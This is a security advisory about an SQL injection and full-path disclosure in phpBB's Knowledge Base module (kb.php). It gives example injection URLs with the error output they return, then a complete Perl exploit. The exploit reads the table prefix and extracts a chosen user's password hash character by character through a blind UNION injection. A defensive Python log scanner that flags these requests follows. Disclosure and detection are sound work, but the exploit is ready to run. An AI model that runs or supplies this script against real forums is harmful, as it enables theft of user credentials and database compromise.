phpBB Knowledge Base module SQL injection and full path disclosure vulnerability
Source: deluxe@security-project.org  Author: deluxe89  Published: 2005-04-22

Affected systems:
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13219

phpBB is a widely used open-source, web-based forum written in PHP. It supports multiple database backends such as Oracle, MSSQL, MySQL and PostgreSQL.

The phpBB Knowledge Base module contains a SQL injection vulnerability; a remote attacker could exploit it to perform unauthorized operations on the database.

The cause is that the application does not properly filter user input before using it in SQL queries. If a user supplies input such as:

/kb.php?mode=cat&cat='

an error message similar to the following is returned, which also discloses the installation's full filesystem path:

Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error

Successful exploitation may lead to compromise of the application and to disclosure or modification of data.

<*Source: deluxe89 (deluxe@security-project.org)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111384185116335&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!

#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = 1;
print "
#########################
# phpBB KnowledgeBase Hack - Exploit
#
# Discovered by [R] and deluxe89
# Exploit by deluxe89
#########################
\n";

if($#ARGV < 2)
{
print "Usage: ./phpbb_kb.pl host path userid [proxy:port]\n";
print "Example: ./phpbb_kb.pl www.host.com /phpBB2/ 2 127.0.0.1:80\n";
exit;
}


my $debug = 0;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $prefix = '';


my ($addr, $port) = ($ARGV[3] ne '') ? split(/:/, $ARGV[3]) : ($host, 80);
if($ARGV[3] ne '')
{
print "[+] Using a proxy\n";
}
else
{
print "[+] You're using NO proxy!\n";
sleep(3);
}

#
# Get the table prefix
#

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

my $value = "mode=cat&cat='";
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

while(<$sock>)
{
if($_ =~ m/FROM (\w+)kb_categories/)
{
$prefix = $1;
print "[+] Table prefix: $prefix\n";
last;
}
}
if($prefix eq '')
{
die("[-] Getting the table prefix failed.\n");
}


#
# Getting the hash
#

print "[+] Getting the hash. Please wait some minutes..\nHash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

if(&test($i, 96)) # ascii > 96: the hex digit is a letter (a-f)
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # otherwise it is a digit (0-9)
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";


# Boolean oracle: returns 1 when the injected condition is true (the UNION
# row reaches the page and trips the DEBUG MODE error), 0 otherwise.
sub test
{
my ($i, $num, $g) = @_;

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "mode=cat&cat=0+union+select+0,1,3,3,7,0+from+${prefix}users+where+user_id=$userid+and+ascii(substring(user_password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num/*";

if($debug)
{
print "\t$value\n";
}


print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

my $if = 0;
while(<$sock>)
{
if($_ =~ m/DEBUG MODE/)
{
return 1;
}
}
return 0;
}
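From the defender's side, the request patterns shown in the description and sent by the Perl script above are easy to pick out of a web server's access log. The following Python is an added example, not part of the advisory: it scans constructed Apache-style log lines (the IPs, timestamps and the per-client threshold are assumptions) for kb.php requests whose cat parameter is not the integer the module expects, and labels the quote probe, the UNION check and the character-by-character boolean probes.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not taken from the advisory), modelled on
# the requests it describes: a normal hit, the quote probe, the UNION check, one boolean probe.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Apr/2005:10:00:01 +0000] "GET /phpBB2/kb.php?mode=cat&cat=3 HTTP/1.1" 200 5120
10.0.0.9 - - [22/Apr/2005:10:00:02 +0000] "GET /phpBB2/kb.php?mode=cat&cat=' HTTP/1.1" 200 812
10.0.0.9 - - [22/Apr/2005:10:00:03 +0000] "GET /phpBB2/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users HTTP/1.1" 200 812
10.0.0.9 - - [22/Apr/2005:10:00:04 +0000] "GET /phpBB2/kb.php?mode=cat&cat=0+union+select+0,1,3,3,7,0+from+phpbb_users+where+user_id=2+and+ascii(substring(user_password,1,1))>96/* HTTP/1.1" 200 812
10.0.0.5 - - [22/Apr/2005:10:00:05 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 9000
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')

def classify_cat(value):
    """Label a kb.php 'cat' value; None means the plain integer the module expects."""
    if re.fullmatch(r"\d+", value):
        return None
    low = value.lower()
    if re.search(r"\bunion\b.*\bselect\b", low):
        # ascii(substring(...)) marks the per-character probe answered via the DEBUG MODE page
        if "ascii(" in low or "substring(" in low:
            return "blind-boolean-injection"
        return "union-injection"
    if "'" in value:
        return "quote-probe"
    return "non-numeric-cat"

def scan_log(text):
    """Return (ip, label, cat_value) for every kb.php request whose cat is suspicious."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/kb.php"):
            continue
        # parse_qs turns '+' into spaces, so the SQL keywords become matchable
        for cat in parse_qs(parts.query, keep_blank_values=True).get("cat", []):
            label = classify_cat(cat)
            if label:
                findings.append((m.group("ip"), label, cat))
    return findings

def noisy_clients(findings, threshold=2):
    """IPs with more than `threshold` suspicious kb.php hits (the blind phase sends dozens)."""
    counts = Counter(ip for ip, _, _ in findings)
    return sorted(ip for ip, n in counts.items() if n > threshold)
```

A single quote-probe finding is worth a look on its own; the hash-extraction phase shows up as a burst of blind-boolean-injection hits from one client, which noisy_clients surfaces.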

Recommendation:
--------------------------------------------------------------------------------
Vendor patches:

phpBB Group
-----------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

http://www.phpbb.com/
